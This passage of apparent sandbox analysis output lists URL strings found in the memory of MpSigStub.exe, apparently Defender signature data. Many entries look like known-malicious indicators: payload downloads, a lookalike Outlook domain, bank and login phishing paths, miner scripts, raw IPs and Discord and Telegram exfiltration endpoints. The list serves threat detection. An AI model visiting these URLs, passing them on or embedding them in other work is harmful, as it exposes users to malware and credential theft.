Source: MpSigStub.exe, 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://193.29.15.147
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://1drv.ms/w/s
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://42801.weebly.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://a.pomfe.co/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://abgchina.org/roundcubes/roundcube/soundcube.web/1file.php
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://acquatrat.com.br/wp-admin/maint/audio2/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://aimsnotification.info/soyakim
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://airsoftne.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: https://am.localstormwatch00.localstormw
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://amigosforever.net/d/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/shared/static/oy44fta2sdgxuuch02tkyvmez9zssxqb.zip
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://arabictv.ml/catalog/controlyte6;ler/payment/mollie-api-client/build/YS0LfExPc7MJU3.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://arteecaligrafia.vI&8&$Ocom.br/imagens/fotos/thumbs/MupJ4cvI&8&$OZzxoElmn.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://asgvprotecao.c
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://asgvprotecao.com.br/wa_php/clZ&LpN-omp/klbd5vxr6mf38o/YxSlZ&LpN-slZ&LpN-9udRlZ&LpN-8U.plZ&Lp
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://backparloursoup.xyz//meme/cors/send.php
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://begumprinters.com/css/absa/php/absajslogo.php?r=
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://bjhvgft67rf.gb.net/vfeg877g7/?cvwrg3g=vv3g3v4f
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/reportmaersk.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://bonshyonloire.ml/exploit/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://buildingsandpools.com/wp-content/iy6ux613260
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://businessonline.o2.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer&#46;bauer
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://c-up.xyz/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://caixadirecta.cgd.pt
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://capirtos.r1-it.stora
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://carmelavalles.com/site/wp-admin/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://cartsmars.info/okmn/
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://cheelersplus.xyz/audio/z2fyes5jywxsywdoyw5achjvdgl2axrplmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://ciginfo.websiteseguro.com/logs/b.doc
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://cl.ly/a93437d0999e/download/reserva%20patricia.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://cld.pt/dl/download/30e57a1d-338a-4c1b-9ad9-db0220f77ef0/bruto.jpg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://clicks.life/care/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://coffreo.biz/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/az2yl
